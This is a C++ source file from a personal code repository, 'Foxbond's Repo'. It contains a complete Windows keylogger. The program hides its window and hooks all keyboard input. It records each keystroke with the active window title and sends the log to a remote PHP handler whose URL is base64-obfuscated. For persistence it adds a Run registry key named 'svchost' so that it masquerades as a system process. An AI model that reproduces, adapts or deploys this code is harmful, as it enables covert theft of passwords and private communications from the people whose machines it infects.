Foxbond's Repo
/** (c) 2012 Michał (Foxbond) Chraniuk */
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <iostream>
//#include <fstream>
#include <ctime>
#include <stdio.h>
#include <string>
#include <cstdio>
//#include <unistd.h>
#pragma comment(lib, "libcurl.lib")
//#pragma comment(lib, "wldap32.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "winmm.lib")
#pragma comment(lib, "ssleay32.lib")
//#pragma comment(lib, "openldap.lib")
#pragma comment(lib, "libeay32.lib")
#include <Strsafe.h>
#include "curl/curl.h"
#include "base64/base64.h"
//#include "base64/base64.cpp"
using namespace std;
string url = base64_decode("aHR0cDovL2ZveGJvbmQubGludXhwbC5pbmZvL2tsL3Byb3RvdHlwZUhhbmRsZXIucGhw==");
string key = "prototypeKey";
string version = "0.1";
string id = "0";
HHOOK hKeyboardHook = 0;
//HHOOK hClipboardHook = 0;//schowek
string LogFile;
HWND hCurrentWindow;
char sWindowTitle[256];
char cReturn[] = {13, 10};
SYSTEMTIME SystemTime;
char cTime[64];
char cFileName[64];
unsigned short error_count=0;
#define BUFSIZE 128
//#define cURL_SAVE_BUFFER 2048
unsigned int save_buffer_size = 102; //10240;
bool modifyRegistry = true;
HKEY registryTarget = HKEY_CURRENT_USER;
bool test_key(void);
void create_key(void);
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Make the class name into a global variable */
char szClassName[ ] = "WindowsApp";
void save_log (void);
void ErrorExit(LPTSTR lpszFunction)
{
// Retrieve the system error message for the last-error code
LPVOID lpMsgBuf;
LPVOID lpDisplayBuf;
DWORD dw = GetLastError();
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
dw,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0, NULL );
// Display the error messages and exit the process
lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,
(lstrlen((LPCTSTR)lpMsgBuf) + lstrlen((LPCTSTR)lpszFunction) + 40) * sizeof(TCHAR));
StringCchPrintf((LPTSTR)lpDisplayBuf,
LocalSize(lpDisplayBuf) / sizeof(TCHAR),
TEXT("%s failed with error %d: %s"),
lpszFunction, dw, lpMsgBuf);
MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK);
LocalFree(lpMsgBuf);
LocalFree(lpDisplayBuf);
ExitProcess(dw);
}
/* shcowek
LRESULT CALLBACK GetMsgProc( int nCode, WPARAM wParam, LPARAM lParam) {
//MessageBox(0, "Wyk", 0, 0);
if (nCode >= 0){
LPMSG m=(LPMSG)lParam;
MessageBox(0, (LPCSTR)(int)m->message, 0, 0);
if(m->message == WM_PASTE) {
MessageBox(0, "Pastee", 0, 0);
}
}
return CallNextHookEx(hClipboardHook, nCode, wParam, lParam);
};
/*
std::string GetClipboardText()
{
// Try opening the clipboard
if (! OpenClipboard(nullptr)){ MessageBox(0, "err1", 0, 0); }
// Get handle of clipboard object for ANSI text
HANDLE hData = GetClipboardData(CF_TEXT);
if (hData == nullptr){ MessageBox(0, "err2", 0, 0); }
// Lock the handle to get the actual text pointer
char * pszText = static_cast<char*>( GlobalLock(hData) );
if (pszText == nullptr){ MessageBox(0, "err3", 0, 0); }
// Save text in a string class instance
std::string text( pszText );
// Release the lock
GlobalUnlock( hData );
// Release the clipboard
CloseClipboard();
return text;
}
/* schowek */
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKbdLLHookStruct = (KBDLLHOOKSTRUCT *)lParam;
if (nCode >= 0) {
if (wParam == WM_KEYUP)
{
if(hCurrentWindow != GetForegroundWindow())
{
hCurrentWindow = GetForegroundWindow();
GetWindowText(hCurrentWindow, sWindowTitle, 256);
GetSystemTime(&SystemTime);
//było sprintf_s
sprintf(cTime, "[ Czas: %02d:%02d:%02d, ", SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond);
LogFile += cReturn;
LogFile += cTime;
LogFile += " Nazwa okna: ";
LogFile += sWindowTitle;
LogFile += " ]";
LogFile += cReturn;
/*
LPDWORD lpdwProcessId = 0;1428
DWORD procId;
procId = GetWindowThreadProcessId(hCurrentWindow, lpdwProcessId);
hClipboardHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)GetMsgProc, 0, procId);
if(hClipboardHook == NULL) {
//MessageBox(0, "bez hooka", 0, 0);
ErrorExit("SetWindowsHookEx(WH_GETMESSAGE");
}*/
}
switch(pKbdLLHookStruct->vkCode)
{
case VK_RETURN:
LogFile += "[Enter]";
LogFile += cReturn;
break;
case VK_BACK:
LogFile += "[Backspace]";
break;
case VK_ESCAPE:
LogFile += "[Escape]";
break;
case VK_CAPITAL:
LogFile += "[Capslock]";
break;
case VK_LMENU:
LogFile += "[LAlt]";
break;
case VK_RMENU:
LogFile += "[RAlt]";
break;
case VK_MENU:
LogFile += "[Alt]";
break;
case VK_CONTROL:
LogFile += "[Ctrl]";
break;
case VK_DELETE:
LogFile += "[Delete]";
break;
case VK_SPACE:
LogFile += " ";
break;
case VK_MULTIPLY:
LogFile += "*";
break;
case VK_ADD:
LogFile += "+";
break;
case VK_SUBTRACT:
LogFile += "-";
break;
case VK_DECIMAL:
LogFile += ".";
break;
case VK_DIVIDE:
LogFile += "/";
break;
case 188:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "<";
else
LogFile += ",";
break;
case 192:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "~~";
else
LogFile += "`";
break;
case 222:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "\"";
else
LogFile += "'";
break;
case 220:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "|";
else
LogFile += "\\";
break;
case 219:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "{";
else
LogFile += "[";
break;
case 221:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "}";
else
LogFile += "]";
break;
case 186:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ":";
else
LogFile += ";";
break;
case 191:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "?";
else
LogFile += "/";
break;
case 190:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ">";
else
LogFile += ".";
break;
case 44:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "<";
else
LogFile += ",";
break;
case 187:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "+";
else
LogFile += "=";
break;
case 189:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "_";
else
LogFile += "-";
break;
case 65:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "A";
else
LogFile += "a";
break;
case 66:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "B";
else
LogFile += "b";
break;
case 67:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "C";
else
LogFile += "c";
break;
case 68:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "D";
else
LogFile += "d";
break;
case 69:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "E";
else
LogFile += "e";
break;
case 70:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "F";
else
LogFile += "f";
break;
case 71:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "G";
else
LogFile += "g";
break;
case 72:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "H";
else
LogFile += "h";
break;
case 73:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "I";
else
LogFile += "i";
break;
case 74:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "J";
else
LogFile += "j";
break;
case 75:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "K";
else
LogFile += "k";
break;
case 76:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "L";
else
LogFile += "l";
break;
case 77:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "M";
else
LogFile += "m";
break;
case 78:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "N";
else
LogFile += "n";
break;
case 79:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "O";
else
LogFile += "o";
break;
case 80:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "P";
else
LogFile += "p";
break;
case 81:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Q";
else
LogFile += "q";
break;
case 82:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "R";
else
LogFile += "r";
break;
case 83:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "S";
else
LogFile += "s";
break;
case 84:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "T";
else
LogFile += "t";
break;
case 85:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "U";
else
LogFile += "u";
break;
case 86:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "V";
else
LogFile += "v";
break;
case 87:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "W";
else
LogFile += "w";
break;
case 88:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "X";
else
LogFile += "x";
break;
case 89:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Y";
else
LogFile += "y";
break;
case 90:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Z";
else
LogFile += "z";
break;
case VK_NUMPAD0:
LogFile += "0";
break;
case VK_NUMPAD1:
LogFile += "1";
break;
case VK_NUMPAD2:
LogFile += "2";
break;
case VK_NUMPAD3:
LogFile += "3";
break;
case VK_NUMPAD4:
LogFile += "4";
break;
case VK_NUMPAD5:
LogFile += "5";
break;
case VK_NUMPAD6:
LogFile += "6";
break;
case VK_NUMPAD7:
LogFile += "7";
break;
case VK_NUMPAD8:
LogFile += "8";
break;
case VK_NUMPAD9:
LogFile += "9";
break;
case 48:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ")";
else
LogFile += "0";
break;
case 49:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "!";
else
LogFile += "1";
break;
case 50:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "@";
else
LogFile += "2";
break;
case 51:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "#";
else
LogFile += "3";
break;
case 52:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "$";
else
LogFile += "4";
break;
case 53:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "%";
else
LogFile += "5";
break;
case 54:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "^";
else
LogFile += "6";
break;
case 55:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "&";
else
LogFile += "7";
break;
case 56:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "*";
else
LogFile += "8";
break;
case 57:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "(";
else
LogFile += "9";
break;
}//end case (chyba)
if ( LogFile.size() > save_buffer_size )
{
save_log(); //cURL save
}
}
}
return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil) {
/* schowek */
//MessageBox(0, GetClipboardText().c_str(), 0, 0);
/*
hClipboardHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)GetMsgProc, GetModuleHandle(0), 0);
if(hClipboardHook == NULL) {
MessageBox(0, "bez hooka", 0, 0);
//ErrorExit("SetWindowsHookEx");
}
/* schowek koniec */
HWND hwnd; /* This is the handle for our window */
MSG messages; /* Here messages to the application are saved */
WNDCLASSEX wincl; /* Data structure for the windowclass */
/* The Window structure */
wincl.hInstance = hThisInstance;
wincl.lpszClassName = szClassName;
wincl.lpfnWndProc = WindowProcedure; /* This function is called by windows */
wincl.style = CS_DBLCLKS; /* Catch double-clicks */
wincl.cbSize = sizeof (WNDCLASSEX);
/* Use default icon and mouse-pointer */
wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
wincl.lpszMenuName = NULL; /* No menu */
wincl.cbClsExtra = 0; /* No extra bytes after the window class */
wincl.cbWndExtra = 0; /* structure or the window instance */
/* Use Windows's default color as the background of the window */
wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;
/* Register the window class, and if it fails quit the program */
if (!RegisterClassEx (&wincl)) {
MessageBox(0, "Nie udało się zarejestrować klasy! Program kończy działanie...", 0, 0);
return 0;
}
/* The class is registered, let's create the program*/
hwnd = CreateWindowEx (
0, /* Extended possibilites for variation */
szClassName, /* Classname */
"SYSTEM", /* Title Text */
WS_OVERLAPPEDWINDOW, /* default window */
CW_USEDEFAULT, /* Windows decides the position */
CW_USEDEFAULT, /* where the window ends up on the screen */
1, /* The programs width */
1, /* and height in pixels */
HWND_DESKTOP, /* The window is a child-window to desktop */
NULL, /* No menu */
hThisInstance, /* Program Instance handler */
NULL /* No Window Creation data */
);
ShowWindow (hwnd, SW_HIDE);
hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, GetModuleHandle(0), 0);
if(hKeyboardHook == NULL) {
ErrorExit("SetWindowsHookEx(WH_KEYBOARD_LL)");
}
create_key();
/* Run the message loop. It will run until GetMessage() returns 0 */
while (GetMessage (&messages, NULL, 0, 0))
{
/* Translate virtual-key messages into character messages */
TranslateMessage(&messages);
/* Send message to WindowProcedure */
DispatchMessage(&messages);
}
if(UnhookWindowsHookEx(hKeyboardHook) == 0)
MessageBox(0, "Funkcja UnhookWindowsHookEx nie powiodła się.", 0, 0);
save_log();
return EXIT_SUCCESS;
}
/* This function is called by the Windows function DispatchMessage() */
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message) /* handle the messages */
{
case WM_DESTROY:
save_log();
PostQuitMessage (0); /* send a WM_QUIT to the message queue */
break;
default: /* for messages that we don't deal with */
return DefWindowProc (hwnd, message, wParam, lParam);
}
return 0;
}
// Write any errors in here
static char errorBuffer[CURL_ERROR_SIZE];
// Write all expected data in here
static string buffer;
// This is the writer call back function used by curl
static int writer(char *data, size_t size, size_t nmemb,
std::string *buffer)
{
// What we will return
int result = 0;
// Is there anything in the buffer?
if (buffer != NULL)
{
// Append the data to the buffer
buffer->append(data, size * nmemb);
// How much did we write?
result = size * nmemb;
}
return result;
}
void save_log (void)
{
//zapisywanie cURL
CURL *curl;
CURLcode result;
//char* method_post="";
char method_post[12240];
sprintf(method_post, "key=%s&version=%s&id=%s&log=%s", key.c_str(), version.c_str(), id.c_str(), LogFile.c_str() );
//MessageBox(0, method_post, 0, 0);
curl = curl_easy_init();
if (curl)
{
// Now set up all of the curl options
curl_easy_setopt(curl, CURLOPT_ERRORBUFFER, errorBuffer);
curl_easy_setopt(curl, CURLOPT_URL, url.c_str() );
//curl_easy_setopt(curl, CURLOPT_HEADER, 0);
//curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writer);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &buffer);
curl_easy_setopt(curl, CURLOPT_POST, 1);
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, method_post);
// Attempt to retrieve the remote page
result = curl_easy_perform(curl);
// Always cleanup
curl_easy_cleanup(curl);
// Did we succeed?
if (result == CURLE_OK) {
//ok
LogFile.clear(); //kasowanie logu
}
else {
//error
LogFile += "\n Save Error!!! \n";
LogFile += errorBuffer;
LogFile += "\n end error log \n";
}
}
else {
//curl object error
LogFile += "\n cURL init error!!! \n";
}
}
bool test_key(void) {
if (modifyRegistry){
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
HKEY hKey;
int regKey=RegOpenKeyEx(registryTarget,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
if(regKey!=0){
return false;
}
regKey=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
RegCloseKey(hKey);
if (regKey !=0){
return false;
}
}
return true;
}
void create_key(void) {
if (modifyRegistry){
string key_path = "%windir%\\svchost.exe";
char *path = (char*)key_path.c_str();
HKEY hkey;
int regKey=RegCreateKey(registryTarget,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
}
}
> Back